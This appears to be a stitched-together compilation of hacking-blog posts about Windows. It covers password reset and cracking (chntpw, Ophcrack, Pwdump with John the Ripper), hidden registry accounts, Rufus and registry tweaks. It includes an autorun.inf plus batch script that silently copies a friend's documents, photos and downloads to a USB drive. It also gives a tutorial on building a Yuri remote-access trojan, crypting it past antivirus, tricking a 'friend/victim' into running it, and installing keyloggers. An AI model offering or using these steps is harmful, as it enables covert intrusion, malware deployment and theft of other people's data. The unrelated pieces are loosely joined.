How to Break Into a Windows PC (and Prevent It from Happening to You)

If you're trying to break into a Windows computer—whether you've forgotten your password or are hatching a more sinster plan—you have quite a few options. Here's how to do it, and how to keep your own computer protected.
There are a few methods to breaking into a computer, each with their own strengths and weaknesses. Here, we'll go through three of the best and most common methods, and nail down their shortcomings so you know which one to use—and how to exploit their weaknesses to keep your own computer secure.

The Lazy Method: Use a Linux Live CD to Get at the Files

If you don't need access to the OS itself, just a few files, you don't need to go through much trouble at all. You can grab any Linux live CD and just drag-and drop files onto a USB hard drive, as you would in any other OS.
How to Break Into a Windows PC (and Prevent It from Happening to You)
How It Works: Just download the live .iso file for any Linux distribution (like the ever-popular Ubuntu) and burn it to CD. Stick it in the computer you want to access and boot up from that CD. Pick "Try Ubuntu" when it comes up with the first menu, and it should take you right into a desktop environment. From here, you can access most of the hard drive just by going to the Places menu in the menu bar and choosing the Windows drive. It should see any NTFS drives just fine.
Note that depending on the permissions of some files, you might need root access. If you're having trouble viewing or copying some files, open up a terminal window (by going to Applications > Accessories > Terminal) and type in gksudo nautilus, leaving the password blank when prompted. You should now have access to everything.
How to Beat It: This method can give you access to the file system, but its main weakness is that the malicious user still can't access any encrypted files, even when using
  gksudo.
So, if the owner of the computer (or you) has encrypted their files (or encrypted the entire OS), you won't get very far.

Sneaky Command-Line Fu: Reset the Password with the System Rescue CD

If you need access to the operating system itself, the Linux-based System Rescue CD is a good option for breaking in. You'll need to do a bit of command line work, but as long as you follow the instructions closely you should be fine..

How It Works: Just download the .iso file for the System Rescue Live CD and burn it to disc. Boot from the disc and hit the default option when the blue screen comes up. After everything loads and you're presented with a command-line interface, type
fdisk -l
to see the drives and partitions on your computer. Pick the Windows partition (usually the largest NTFS partition) and note the name, e.g.
  /dev/sda3.

Then, run the following command:
ntfs-3g /dev/sda3 /mnt/windows –o force
Make sure to replace
  /dev/sda3
with the partition you noted earlier. Next,
  cd
to your Windows/System32/config directory with this command:
cd /mnt/windows/Windows/System32/config
We want to edit the SAM file in this folder, so type the following command to get a list of users:
chntpw –l SAM
Note the username you want to access, and then type the following command, replacing
Whitson Gordon
with the username in question.
chntpw –u "Whitson Gordon" SAM
At the next screen, choose the first option by typing the number
  1
and hitting Enter. This will clear the user password, making it blank. When it asks you to write hive files, hit
  y
and press Enter. It should say OK, and then you can type
reboot
to reboot the computer. When you boot into Windows, you'll be able to log in to that user's account without a password.
How to Beat It: Once again, the weakness of this method is that it still can't beat encryption. Changing the password will disallow you access to those encrypted files, which, if the user has encrypted their entire OS, makes this method pretty useless. If they've only encrypted a few files, though, you'll still be able to access all the unencrypted stuff without a problem.

Brute Force: Crack the Password with Ophcrack

Where the other two methods are vulnerable to encryption, this method will give you full access to everything the user can access, including encrypted files, since this method relies on finding out the user's password instead of bypassing it.

How It Works: We've actually gone through this method before, but it doesn't hurt to have a refresher. All you need to do is download and burn the Ophcrack Live CD (use the Vista version if you're cracking a Windows 7 PC) and boot from it on your computer. It'll take a little bit of time to boot, but eventually it will bring you to a desktop environment and start attempting to crack passwords. This may take a while. You'll see the passwords pop up in the top pane of the window, though, when it finds them (or, if it doesn't find them, it'll notify you). You can then reboot and log in to Windows using those passwords.
How to Beat It: While this method works on encrypted OSes, it can't crack every password out there. To increase your chance of having an uncrackable password, use something complicated and greater than 14 characters. The stronger your password, the less likely Ophcrack will be able to figure it out.

Hack Windows Password Using Pwdump and John The Ripper

Things we need :-

1. Pwdump - To dump windows password hashes
2. John the Ripper - To crack the dumped password hashes

Procedure:-

1.  Open My computer and go to C:\Windows\system32 ,now place the Pwdump file which we download earlier

2. Now open command prompt and navigate to C:\Windows\system32 \Pwdump By Using the "cd " command  and  click enter

Example :-
Cd C:\Windows\system32 \Pwdump
3. Now you can see a list of Pwdump commands as shown

4. Now enter pwdump - localhost >>“ destination of the output file “ (for 32-bit computers) and pwdump -x localhost >> “destination of the out put file “(for 64- bit computers )

Example :-
Cd C:\Windows\system32 \Pwdump localhost >> C:\hash.txt (for 32-bit computers )

Cd C:\Windows\system32 \Pwdump -x localhost >> C:\hash.txt (for 64-bit computers)

5. Now open  the Out put  file (In my case its hash.txt )From c:/ you can see the names of the different  users with password hashes Now copy the hashes  corresponding to the admin account

6. Now make JTR (John the ripper ) crackable file by Opening a notepad and pasting the hashes which we copied in the previous step in the format given below
Example:-
User:gyuJo098KkLy9
where "gyuJo098KkLy9" is the  hash which we copied in the 5th step

7. Save the file as crackme.txt (just an example) and go to the prompt and type 'john crackme.txt' (with out quotes ). Now wait for a while ,the password hashes will be cracked  .You can also use the Various options in John the ripper to make the cracking a little faster .

Note : You can also use any other password cracking tool or online password cracking sites like www.cracker.offensive-security.com to crack the hashes

Create bootable USB drives the easy way

 Rufus

Create bootable USB drives the easy way

Rufus is a utility that helps format and create bootable USB flash drives, such as USB keys/pendrives, memory sticks, etc.
It can be especially useful for cases where:
  • you need to create USB installation media from bootable ISOs (Windows, Linux, UEFI, etc.)
  • you need to work on a system that doesn't have an OS installed
  • you need to flash a BIOS or other firmware from DOS
  • you want to run a low-level utility
Despite its small size, Rufus provides everything you need!
Oh, and Rufus is fast. For instance it's about twice as fast as UNetbootin, Universal USB Installer orWindows 7 USB download tool, on the creation of a Windows 7 USB installation drive from an ISO. It is also marginally faster on the creation of Linux bootable USB from ISOs. (1)
A non exhaustive list of Rufus supported ISOs is also provided at the bottom of this page. (2)
  CALLING ON NEW TRANSLATORS!
The Rufus application can use your help in adding new translations, and I am looking for volunteers that would be kind enough to create new localizations for Hebrew and Thai.
If you think you are up to the task, please have a look here.

System Requirements:

Windows XP or later, 32 or 64 bit doesn't matter. Once downloaded, the application is ready to use.
I will take this opportunity to express my gratitude to the translators who made it possible for Rufus, as well as this webpage, to be translated in various languages. If you find that you can use Rufus in your own language, you should really thank them!

Usage

Download the executable and run it – no installation is necessary.
The executable is digitally signed and the signature should state:
  • "Akeo Consulting" (v1.3.0 or later)
  • "Pete Batard - Open Source Developer" (v1.2.0 or earlier)

Notes on DOS support:

If you create a DOS bootable drive and use a non-US keyboard, Rufus will attempt to select a keyboard layout according to the locale of your system. In that case, FreeDOS, which is the default selection, is recommended over MS-DOS, as it supports more keyboard layouts.

Notes on ISO Support:

All versions of Rufus since v1.1.0 allow the creation of a bootable USB from an ISO image (.iso).
Creating an ISO image from a physical disc or from a set of files is very easy to do however, through the use of a CD burning application, such as the freely available CDBurnerXP or ImgBurn.

Notes on UEFI & GPT support:

Since version 1.3.2, Rufus support UEFI as well as GPT for installation media, meaning that it will allow you to install Windows 7, Windows 8 or Linux in full EFI mode.
However, Windows Vista or later is required for full UEFI/GPT support. Because of OS limitations, Windows XP restricts the creation of UEFI bootable drives to MBR mode.

Donations

Since I'm getting asked about this on regular basis, there is no donation button on this page.
The main reason is that I feel that the donation system doesn't actually help software development and worse, can be guilt-inducing for users who choose not to donate.
Instead, I think that "mécénat"; or developer patronage, from companies which benefit most from a healthy FLOSS ecosystem, is what we should be aiming for. This is because, unless they are backed by a company, developers who want to provide quality Open Source software cannot realistically sustain full time development, no matter how generous their software users are.
Also, unless you are blocking them (hint, hint), you'll notice that there are ads on this page, which I consider sufficient revenue enough.
Finally the fact that I have the freedom to develop Free Software in my spare time should indicate that I'm well-off enough, and therefore that you should direct your generosity towards people who need it a lot more than I do. If you really insist, you can always make a donation to the Free Software Foundation, as they are the main reason software like Rufus is possible.
At any rate, I'll take this opportunity to say thank you for your continuing support and enthusiasm about this little program: it is much appreciated!
But please continue to feel free to use Rufus without any guilt about not contributing for it financially – you should never have to!

Create a hidden account or hide an existing in Win XP

Create a hidden account or hide an existing in Win XP

If you want to hide your account from the Windows Log-on screen or create a new fresh invisible one just do the following:
1. Go to Control Panel and create a NEW_ACCOUNT inside User Accounts
Create a hidden account
2. Go to START->RUN–type in regedit–
3. Carefully go to the following destination;                                                             HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WinLogon\SpecialAccounts\UserList
4. Here create a new DWORD by right clicking and name it as you did your NEW_ACCOUNT. If you want to hide an existing one, just type in its name.
Create a hidden account
5. The value of the DWORD has to be zero if you want it to be hidden. If you want it to show, just change the value to 1.
6. Now log off and see that your account is not in the logon screen.
7. To logon to your hidden account press CTRL+ALT+Delete twice. Here type in your NEW_ACCOUNT and that’s it

Know How Long You Have Been Running Your Computer

Know How Long You Have Been Running Your Computer

You might have never noticed your wastage of time when you are using computer, have you? You’ll never notice that you took 1 hour completely just to send your CV documents via mail to an organization. And there are also not such active and easily accessible tools to notify the time interval you’ve been using your computer since the windows startup.
However with Windows 7, you have this feature easily accessible in task manager. To see the length of time open up the task manager window.
You can either open task manager window by pressing CTRL+ALT+DELETE and clicking on start task manager or by just going to RUN command and typing “taskmgr” (without quotes).
Go to the Performance tab and se the uptime timer. This is where you’ll see how long have you been online in your windows.
Besides this, there are also many third-party tools which help you to see the time period being online in your computer.
You got your up time of your desktop. But, how to know the time of your internet connection?
You can easily do this by following the steps below:
In the control panel open Network Connections. Identify the adapter which is actually connecting to the internet gateway and open it.
In my case it was Local Area Connection.
After you open it you’ll see the duration.
This is the time that you’ve been connecting to the internet.
Hope this was informative.

Steal Files From Windows7/Vista To USB Drive

Steal Files From Windows7/Vista To USB Drive tagged:

Steal Files From Windows7/Vista To USB Drive

I am going to teach you how you can do this from batch file with the help of autorun.inf file.
Let me tell you the basic things what will happen.
When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).
Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.
Here goes the batch code:
@echo off
:CHECK
if not exist “%homedrive%\Copied_files” md “%homedrive%\Copied_files”
if exist “%systemdrive%\files” goto COPIER7
goto ERROR
:COPIER7
if not exist “%homedrive%\Copied_files\%computername%” md “%homedrive%\Copied_files\%computername%”
if not exist “%homedrive%\Copied_files\%computername%\VIDEOS” md “%homedrive%\Copied_files\%computername%\VIDEOS”
if not exist “%homedrive%\Copied_files\%computername%\PICTURES” md “%homedrive%\Copied_files\%computername%\PICTURES”
if not exist “%homedrive%\Copied_files\%computername%\MUSIC” md “%homedrive%\Copied_files\%computername%\MUSIC”
if not exist “%homedrive%\Copied_files\%computername%\DOWNLOADS” md “%homedrive%\Copied_files\%computername%\DOWNLOADS”
copy /y “%userprofile%\Documents\*.*” “%homedrive%\Copied_files\%computername%”
copy /y “%userprofile%\Videos” “%homedrive%\Copied_files\%computername%\VIDEOS”
copy /y “%userprofile%\Music” “%homedrive%\Copied_files\%computername%\MUSIC”
copy /y “%userprofile%\Pictures” “%homedrive%\Copied_files\%computername%\PICTURES”
copy /y “%userprofile%\Downloads” “%homedrive%\Copied_files\%computername%\DOWNLOADS”
MSG %username% “DONE!”
exit
:ERROR
exit
What it actually does is in first case ,CHECK, it checks if your removable storage have folder named, Copied_files or not. If it doesn’t have then it creates one by using MD (Make Directory) command.
Again it checks if you have files folder then it will assume that you are using windows Vista/7. Other wise it will return an error and exits.
Now I’ve defined another two cases after the first case CHECK, that is COPIER7 case and ERROR case.
Case COPIER7 will execute when the program recognizes it is Windows Vista/7, where the real copying work goes on.
Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.
This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.
Now let’s create a file that will load it automatically.
[autorun]
Open=Filename.bat
Action=File Copier
The above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.
Copy the two files, autorun.inf and Filename.bat in your flash drive.
Then plug in your device to your friends PC and do the evil things.
Where is the flaw?
It shows Command prompt window and process of copying (thank god your noob never think that it actually copying).
Another thing is that it determines the windows by searching the file users and Docuemnts and settings, which is not the right way to determine your system operating system.
However this is just an educational tutorial.
Hope this tutorial was helpful.

Remote Hacking

Remote Hacking

n this tutorial you will learn how to hack a computer any where in the world. Ok well not anywhere obviously things like the military and the goverment will have very high security so you definately wont be able 2 hack them using this method. I hope not aniways =\.

A Major Notice If you are behind a router you will need to port forward your router. To do this you can use a DMS. Its hard to explain as every router has a different interface ( homepage that has a different layout ) so i suggest you go to google and search portforward.com. It will teach you how to port forward your router there.

Ok to begin with you will need these three tools

Code:
Daemon Crypt - http://rapidshare.com/files/8161346/Daemon_Crypt.rar
Pc Guard - http://rapidshare.com/files/11136172/PC_GUard.rar
Yuri Rat - http://rapidshare.com/files/8161510/Yuri_Rat.rar

Ok now that you have these three tools your 1st step will be to open up Yuri Rat and then click on server build

To get IP Address go to Start > Run > Type CMD and hit enter. When the black box appears type in IPCONFIG. You will then have your IP Address

Port: You Can Leave As Default (-789Cool

Assigned Name: Doesn?t effect how the server will work its just to keep you more organized so if you wanted to hack your friend ?JOE? and specifically make this server for him then you may want to type something like ?JOES TROJAN?.

Server Install Name: You should leave this as default as I myself don?t know what the difference is as every server you make is named server when it is 1st created anyway. Do not change it as it may make problems but I am not sure.

Ok as you can see there are more settings on the right hand side. I am going to recommend you settings for different purposes

To Hack A Friend For Fun: Uncheck Everything Unless You Want To Do Optional
(OPTIONAL) Melt Server - Your server will disappear into another folder
(OPTIONAL) Custom Icon if you want to make it more believable or something then get an icon of super Mario or something you get my drift

To Find Out Valuable Information: Check Everything

Ok Now You Are Finished Click Build

Your server will then be saved to your C:\ or Hard Drive which ever you know it as. Now we are going to make the server about 90% Undetectable. Only once has one of my servers been detected by an anti virus and I think it was a Norton not sure which version. Ive scanned more then once with Kasper Sky & Symantec Anti Virus and every time they said its clean so lets begin

Open Up Daemon Crypt

Select Your File by clicking browse and going to the folder your server is in. If you have not moved it, it will most likely be in C:\

So Now You Have This

Remote Hacking - Black Hat Hackers

Click On Crypt and then you can close Daemon Tools

Now Install Your Pc Guard for Win32

When you open it you should get this

Ok you have to do basically the same thing as what you did with daemon tools. Click Browse and then find your server so that you have this

You then want to click on the General Settings and put these settings

Ok now you want to go to customization and make sure nothing is ticked

For the last step you want to click the protection methods tab and set it to plain. And then click on protect

Your server is now undetectable =)

Ok so now we have our server and everything is ready to go. Only thing now is to do some social engineering. Basically just lie to your friend/victim and tell them that it is a harmless file. If you do not know anything about your victim talk 2 him for like 3 days find out what he likes. Then lets say he likes football and naked women XD. say to him its a funny game where you play a 5minute 2D football match and if you win a sexc girl comes up on the screen and strips or something along them lines. Im not to good at social engineering. You could even say to your friend/victim that it is a patch for a game that you know that they have and it adds on extra things. The Server is now on there computer and they have double clicked it. If you checked the melt server option then the server will basically evaporate into their computer. They say hey its not working you say hey thats strange it works on my comp. Ahh fuck it i cant b bothered 2 send it again..

Ok so now you have the server running on there comp and it has opened up the default port for you to connect to.

Once again open Yuri Rat and click on listen. Yuri rat will then listen for your online servers that you have gave to people running on the default port 7898. If the person who you sent the rat to is not online you cant connect. When the server you sent out to your friend/victim a balloon notification will pop up. Note that yuri rat should still be listening for the servers. The server will show up in yuri rat. You right click and press connect. And there you go. you are now successfully connected to your victim

Ok now without uploading plug ins from yuri rat to your friends/victims computer you will only be able to do limited things with the program which are Download files from there comp & put files from your comp onto their comp.

When you are connected click on plug ins and them upload all of them.

You will then have access to keyloggers, screen capture and muc more. If you get stuck click on the help button and it wil tel you more aout plug ins

Enjoy =)...And REMEMBER THIS IS FOR INFORMATIONAL PURPOSES ONLY...IM NOT RESPONSIBLE FOR ANY OF YOU STUPID  GET IN TROUBLE USING IT!!!!

How to Alter Windows Product ID

How to Alter Windows Product ID

How to Alter Windows Product ID

If you are running a Microsoft Windows operating system on your computer, then you are most likely aware of the fact that your PC will have a Product ID. This Product ID is a system specific alphanumeric code which is derived/calculated based on the Windows product key you use and the hardware configuration of your Computer. In simple words, Product ID is the alphanumeric code that you see when you Right-Click on the My Computer icon and select the Properties option.

Ever wondered how to alter the Windows Product ID?

It is possible to alter the Windows Product ID and change it to what ever you like. For example, you can change the Product ID and put your nickname in place of the formal Product ID displayed by the Operating System. This hack is too easy and can be done within minutes. The screenshot showing the altered Product ID is given below

Win 7 PC showing Original PID
As you can see from the above screenshot it is simple and easy to make your Windows display what ever you want in the place of the real Product ID. Here is a step-by-step procedure to alter your Windows Product ID.

1. Goto Start->Run and type the following in the Run dialog box
regedit

2. After you open the Registry Editor, navigate to the following key
HKey_Local_Machine\Software\Microsoft\Windows NT\Current Version

3. On the right hand side, you can see an entry by name ProductID listed under the heading Name.

4. Double-Click on ProductID, a dialog box will pop-up showing your Windows PID. Now you can delete the original PID and enter anything of your choice.

5. Once you are done, just click on OK and close the Registry Editor. Now you can see the altered Product ID in the Windows Properties window.
NOTE: This trick works on Win 7, Vista and Win XP

I hope you like this trick.
